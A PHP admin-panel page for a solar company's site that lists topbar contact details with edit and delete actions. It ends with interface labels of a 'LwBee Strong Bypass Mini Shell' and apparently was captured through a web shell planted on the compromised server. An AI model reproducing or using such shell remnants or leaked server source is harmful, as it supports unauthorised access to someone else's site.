/home3/vehiclea/public_html/admin-suryasolarsystems-com/topbarReport.php
<?php 
$_SESSION['active'] = 'topbarReport';
include 'header.php';
include 'sidelinks.php';
include 'functions.php';
$topbar_selectAll = topbar_selectAll();
?> 

<div class="content-wrapper">
<div class="container-xxl flex-grow-1 container-p-y">
	 <h4 class="fw-bold py-3 mb-4">Topbar Report</h4>
	 <div class="row">
	 	<div class="col-xxl">
	 		 <div class="card mb-6">
	 		 	 <div class="card-header d-flex align-items-center justify-content-between">
		            <h5 class="mb-0">Reports</h5>
		            <small class="text-muted float-end">Default label</small>
                 </div>
                 <div class="card-body">
                 	<div id="update">
                 	<?php
                   if(!empty($_GET['upd'])){
                 ?>
			     <div align="center">
			      <h4 style="color:green;">Topbar Data Updated Successfully </h4>
			    </div>
              <?php
                }
                ?>
            </div>
            <div align="center" style="display: none;" id="delete">
            	 <h4 style="color:red;">Topbar Data Deleted Successfully </h4>
            </div>
                 	<div>
                 		<table class="table">
                 			<thead>
	                 			<tr>
	                 				<td>#</td>
	                 				<th>Address</th>
	                 				<td>E-mail</td>
	                 				<td>Mobile No</td>
	                 				<th>Action</th>
	                 			</tr>
                 			</thead>
                 			<tbody>
                 				<?php
                 				  $i=1;
                                  while($row = mysqli_fetch_array($topbar_selectAll)){
                 				?>
                 				<tr>
                 					<td><?= $i?></td>
                 					
                 					<td><?= strtoupper($row['address'])?></td>
                 				<td><?= strtoupper($row['mailID'])?></td>
                        <td><?= strtoupper($row['mobileNo'])?></td>
                       
                 					<td>
                 						<a href="topbar_edit.php?edit=<?= $row['id']?>" class="btn btn-primary">Edit</a>
                 						<a href="javascript:void();" onclick="confirmDelete(<?= $row['id']?>)" class="btn btn-danger">Delete</a>
                 					</td>
                 				</tr>
                 				<?php
                 				  $i++;
                                   }
                 				?>
                 			</tbody>
                 			
                 		</table>
                 	</div>
                 </div>
	 		 </div>
	 	</div>
	 </div>
</div>

 <?php
include 'footer.php';
?>

<script>
       function confirmDelete(topbarid)
       {
        
          if (topbarid != '') {
            var x = confirm('Are you sure to Delete?');
          if(x){
          $.ajax({
            url : "delete.php",
            data :  {topbarid : topbarid},
            type : 'POST',
            success : function(response) {
              if(response ==1){
               $('#delete').show();
               $('#update').hide();
                window.location.href = "topbarReport.php";
              }
                
               
            }
        });
        }
       }
     }
    </script>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File